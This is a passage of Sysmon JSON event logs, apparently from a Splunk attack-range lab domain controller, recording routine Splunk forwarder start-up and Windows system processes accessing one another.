{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1876,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.742\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-00106CC50300}\r\nTargetProcessId: 3824\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.742","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-00106CC50300}","TargetProcessId":"3824","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1877,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.749\r\nProcessGuid: {41C8662E-1F75-5F25-0000-0010BAC60300}\r\nProcessId: 4000\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" generate-ssl\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1F75-5F25-0000-00106CC50300}\r\nParentProcessId: 3824\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.749","ProcessGuid":"{41C8662E-1F75-5F25-0000-0010BAC60300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" generate-ssl","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1F75-5F25-0000-00106CC50300}","ParentProcessId":"3824","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1878,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.743\r\nSourceProcessGUID: {41C8662E-1F75-5F25-0000-00106CC50300}\r\nSourceProcessId: 3824\r\nSourceThreadId: 3888\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-0010BAC60300}\r\nTargetProcessId: 4000\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1803d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.743","SourceProcessGUID":"{41C8662E-1F75-5F25-0000-00106CC50300}","SourceProcessId":"3824","SourceThreadId":"3888","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-0010BAC60300}","TargetProcessId":"4000","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1803d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1879,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.743\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-0010BAC60300}\r\nTargetProcessId: 4000\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.743","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-0010BAC60300}","TargetProcessId":"4000","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1880,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.743\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.743","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1881,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.743\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.743","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1882,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.743\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.743","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1883,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.743\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.743","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1884,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.743\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.743","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d